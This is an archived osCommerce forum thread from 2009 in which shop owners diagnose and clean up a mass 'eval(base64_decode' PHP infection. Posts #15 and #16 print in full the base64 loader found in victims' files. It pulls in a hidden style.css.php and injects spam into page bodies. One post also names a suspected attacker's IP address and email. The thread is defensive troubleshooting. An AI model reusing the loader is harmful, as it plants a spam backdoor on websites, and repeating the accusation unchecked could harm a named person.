Jump to content



* * * * * 2 votes

eval(base64_decode Hack


This topic has been archived. This means that you cannot reply to this topic.
125 replies to this topic

#1   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 01 October 2009 - 10:23 AM

eval(base64_decode  hack going around the internet,

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
Some of the more common signs of this are
* Category images stop displaying
* FCK editor refuses to display images folder
* Payment modules stop working
* Checkout process stops working

How will you know?
Open any PHP file on your server, if at the very top you see a line like
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
Then you have been hacked.

To clean your site you have two options,
1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
And restore from a good back up. This is the best and easy route.

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

Now your site is free on the code, you need to prevent it from happening again.

How to prevent infection.

This is not guaranteed 100% proof but it is going to help stop re-infection.

Change the name of your admin folder to something less obvious.
Delete  admin/filemanager.php and associated links.
Ensure that your folder permissions are never set higher than 755
Install some security addons,
Also some ideas from this post can help you,
If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
There is a lot of fragmented help on the forums, I have pulled some of it together here,  read up all you can there are a lot of great people posting good information here.
Sometimes you're the dog and sometimes the lamp post

My Contributions

#2   pinklep

pinklep
  • Members
  • 95 posts

Posted 01 October 2009 - 01:10 PM

View PostFIMBLE, on Oct 1 2009, 04:23 AM, said:

eval(base64_decode  hack going around the internet,

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
Some of the more common signs of this are
* Category images stop displaying
* FCK editor refuses to display images folder
* Payment modules stop working
* Checkout process stops working

How will you know?
Open any PHP file on your server, if at the very top you see a line like
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
Then you have been hacked.

To clean your site you have two options,
1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
And restore from a good back up. This is the best and easy route.

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

Now your site is free on the code, you need to prevent it from happening again.

How to prevent infection.

This is not guaranteed 100% proof but it is going to help stop re-infection.

Change the name of your admin folder to something less obvious.
Delete  admin/filemanager.php and associated links.
Ensure that your folder permissions are never set higher than 755
Install some security addons,
Also some ideas from this post can help you,
If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
There is a lot of fragmented help on the forums, I have pulled some of it together here,  read up all you can there are a lot of great people posting good information here.

Thank you very much for the information.  I found a file called NuSoup.php that I dont recognize.  Could this be a file used for hacking?
I am a Jedi, like my father before me!

#3   ecartz

ecartz
  • Members
  • 1,964 posts

Posted 01 October 2009 - 02:31 PM

View PostFIMBLE, on Oct 1 2009, 06:23 AM, said:

Ensure that your folder permissions are never set higher than 755
It's worth noting that ownership is as important as permissions.  If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777.  If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.  

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.
Always backup before making changes.

#4   jonatanvalencia

jonatanvalencia
  • Members
  • 12 posts

Posted 02 October 2009 - 01:07 AM

Damn, I am hacked, I saw that line since one month ago and I thought it was strange but no catched enough attention from me.

Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body html code and I said it was impossible

I hope to clean up my whole sites.

Regards

#5   PapaJohnL

PapaJohnL
  • Members
  • 1 posts

Posted 02 October 2009 - 05:15 PM

FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

For what it's worth, in case any of you have a forum, he is registering under the name  ben_edit@yahoo.com

Edited by PapaJohnL, 02 October 2009 - 05:20 PM.


#6   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 02 October 2009 - 05:34 PM

View PostPapaJohnL, on Oct 3 2009, 03:15 AM, said:

FYI on this hack...I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to php files. So, It would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

For what it's worth, in case any of you have a forum, he is registering under the name  ben_edit@yahoo.com
My list of banned IPs continues to grow.


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#7   germ

germ
  • Members
  • 13,921 posts

Posted 03 October 2009 - 01:06 AM

Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle...
:huh:

Like vultures to a rotting carcass...
:o
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

#8   Jet200

Jet200
  • Members
  • 106 posts

Posted 03 October 2009 - 06:32 AM

question on the database restore part...

will i lose any info that i've acquired from infection (9/22) until now?

#9   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 03 October 2009 - 08:41 AM

View PostJet200, on Oct 3 2009, 07:32 AM, said:

question on the database restore part...

will i lose any info that i've acquired from infection (9/22) until now?

Yes you will, restoring will take your database and all information contained within back to the restore date.
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#10   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 03 October 2009 - 08:44 AM

View Postpinklep, on Oct 1 2009, 02:10 PM, said:

Thank you very much for the information.  I found a file called NuSoup.php that I dont recognize.  Could this be a file used for hacking?

There is a nusoap.php is that what you mean?
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#11   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 02:44 PM

I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed?

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.
Flying away to get back to work.

#12   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 08:14 PM

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.
You really need to decode the line to find the place that the files are located in.
There can be a lot of files or one or two, and called different names.
style.css.php is one
dg.php another
there are .swf files also

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#13   geode vibrations

geode vibrations
  • Members
  • 4 posts

Posted 04 October 2009 - 08:33 PM

<b>To clean your site you have two options,</b>
1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
And restore from a good back up. This is the best and easy route.


Hello, can you help?

Followed advise and I was infected. Have been through all files and removed all php  from server. I assume that  restore is done from oscommerce admin. When I go to access this i have deleted     shop/admin/login.php    and so can't access it to reload. I know my product information is still there in files pics etc.  how can I get the missing php so I can restore?

#14   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 08:38 PM

Hi you can use one from back up, or you can download a fresh copy of your osCommerce version and upload the file from that
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#15   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 09:33 PM

Hello,

I have tried so many ways to use the decoder you reccomend, with no luck. Here is the code:

**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }
  
// BOF edit pages
$pages_name = "home";
$page_query = tep_db_query("select pd.pages_title, pd.pages_body, p.pages_id
Flying away to get back to work.

#16   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 09:36 PM

here it is
'/catalog/includes/languages/english/modules/shipping/style.css.php

For anyone else having problems you need to strip the tags and apostrophes so it looks like

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==

Nic

Edited by FIMBLE, 04 October 2009 - 09:36 PM.

Sometimes you're the dog and sometimes the lamp post

My Contributions

#17   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 09:42 PM

View PostFIMBLE, on 04 October 2009 - 09:36 PM, said:

here it is
'/catalog/includes/languages/english/modules/shipping/style.css.php

Nic

So besides cleaning or replacing each php file, is that the only file that needs to be removed?
Flying away to get back to work.

#18   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 09:44 PM

you need to compare the folder contents with either your back up or another trusted source, as ive said a few times here there can be many new files added.
You will be better off deleting the folder and uploading a good one.
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#19   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 05 October 2009 - 01:41 AM

Nic found 35 hidden files in my site that didnt belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now.

I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running.

Funny I am sleeping when most of you are awake and vise versa.

Best wishes!
Sam- in Texas
Flying away to get back to work.

#20   fijiislander

fijiislander
  • Members
  • 7 posts

Posted 05 October 2009 - 02:55 AM

Joining the club - Hacked - and my team lost again today.

I can confirm that any php file, even simple redirects in subdomains, will get nailed.  Incidentally I had 755 as the minimum, but now I know better.

Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla?

Obviously the authors "like" OsCommerce.